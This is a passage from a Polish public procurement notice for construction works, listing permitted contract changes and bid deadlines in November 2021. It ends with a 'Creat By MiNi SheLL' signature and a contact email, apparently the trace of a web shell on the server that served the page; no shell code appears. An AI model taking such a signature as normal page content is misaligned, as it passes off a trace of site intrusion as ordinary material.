wykazać brak<br/>podstaw wykluczenia z postępowania o udzielenie zamówienia. W przypadku wspólnego<br/>ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 5.5.) niniejszego ogłoszenia, składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenie to potwierdzać ma spełnianie warunków udziału w postępowaniu oraz brak<br/>podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na mocy art. 455 ust. 1 pkt 1) ustawy Zamawiający przewiduje następujące zmiany<br/>postanowień zawartej umowy:<br/>1) zmiany strony umowy w przypadku następstwa prawnego wynikającego z odrębnych<br/>przepisów,<br/>2) zmiany terminu wykonania umowy w przypadku:<br/>a) wystąpienia zdarzeń siły wyższej – o czas trwania przeszkody; w rozumieniu niniejszej umowy<br/>„siła wyższa” jest to zdarzenie nadzwyczajne, zewnętrzne wobec stron i niemożliwe do<br/>zapobieżenia, którego nie udało się uniknąć nawet w wypadku maksymalnej staranności stron;<br/>strona powołująca się na stan siły wyższej jest zobowiązana do niezwłocznego pisemnego<br/>powiadomienia drugiej strony, a następnie do udokumentowania zaistnienia tego stanu; obie<br/>strony będą zwolnione od odpowiedzialności za niewykonanie umowy w takim zakresie, w jakim<br/>nastąpiło to na skutek zdarzeń siły wyższej,<br/>b) wystąpienia robót zamiennych lub dodatkowych, uniemożliwiających wykonanie przedmiotu<br/>umowy w terminie umownym,<br/>c) wystąpienia niekorzystnych warunków atmosferycznych – o czas trwania przeszkody;<br/>wydłużenie terminu wykonania umowy może nastąpić maksymalnie o tyle dni, ile było dni, w<br/>których wystąpiły niekorzystne warunki atmosferyczne wraz z czasem potrzebnym na usunięcie<br/>skutków zaistnienia niekorzystnych warunków i dotyczy wyłącznie robót, co do których wystąpiła<br/>konieczność wstrzymania spowodowana danymi warunkami. Niekorzystne warunki<br/>atmosferyczne oznaczają warunki, w których niemożliwe jest prowadzenie robót bezpiecznie<br/>pod względem przepisów i zasad BiHP, w sposób prawidłowy, zgodny z umówioną technologią<br/>lub zasadami sztuki budowlanej. Jako niekorzystne warunki atmosferyczne rozumie się między<br/>innymi:<br/>- wystąpienie średniej dziennej ujemnej temperatury niższej niż minus 5 st C lub temperatury<br/>wyższej niż plus 35 st C w zakresie robót zewnętrznych budowlanych.<br/>- nadzwyczajne zjawiska pogodowe takie jak: nawałnice, ulewne deszcze, bardzo silne wiatry –<br/>uniemożliwiające prowadzenie robót budowlanych w ogóle, bądź bez niewspółmiernych<br/>nakładów.<br/>W przypadku prowadzenia robót budowlanych wymagających zachowania określonego reżimu<br/>temperaturowego, wartość (lub wartości) dziennej temperatury, która uznana będzie za<br/>niekorzystne warunki atmosferyczne ustalana będzie indywidualnie na podstawie dokumentów<br/>technicznych dla realizowanej technologii robót. Wykazanie zaistnienia okoliczności<br/>uniemożliwiających prowadzenia prac, a tym samym umożliwiających zmianę terminu realizacji<br/>umowy leży po stronie Wykonawcy. W okresie wystąpienia niekorzystnych warunków<br/>atmosferycznych, Wykonawca zobowiązany jest do udokumentowania ich zaistnienia poprzez<br/>przedłożenie Zamawiającemu danych publikowanych na stronie IMGW.<br/>O wystąpieniu zjawiska uznanego za niekorzystne warunki atmosferyczne Wykonawca<br/>niezwłocznie poinformuje Zamawiającego i dokona wpisu w dzienniku budowy. Zamawiający ma<br/>prawo weryfikacji ustaleń nt. zjawisk uznanych za niekorzystne warunki atmosferyczne na podstawie danych z IMGW (właściwych dla miejsca budowy), w szczególności średniej<br/>temperatury dziennej,<br/>d) wydania decyzji przez służby konserwatorskie lub nadzoru budowlanego, mające wpływ na<br/>wykonanie przedmiotu umowy,<br/>e) wycofania z rynku lub zakończenia produkcji materiałów lub urządzeń, których użycie<br/>przewidziano w toku realizacji przedmiotu umowy i konieczności zastąpienia ich innymi, o ile<br/>mają wpływ na wykonanie przedmiotu umowy,<br/>f) wystąpienia okoliczności leżących po stronie Zamawiającego lub niezawinionych przez<br/>Wykonawcę, uniemożliwiających rozpoczęcie, wykonanie w terminie lub kontynuowanie<br/>wykonywania przedmiotu umowy,<br/>3) zmiany w kolejności i terminach płatności, w przypadku zmian w harmonogramie<br/>prowadzonych prac, (...) UWAGA! Ze względu<br/>na ograniczoną liczbę znaków możliwych do wpisania w niniejszym polu, pełny zakres zmian<br/>zawarty jest w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu wyłącznie za pośrednictwem Platformy Przetargowej: https://polsl.logintrade.net/rejestracja/, zgodnie z treścią instrukcji pn. Udział w trybie podstawowym bez negocjacji, znajdującą się w zakładce „Instrukcje” na ww. Platformie. Nie dopuszcza się możliwości złożenia oferty za pośrednictwem poczty elektronicznej.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-24 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com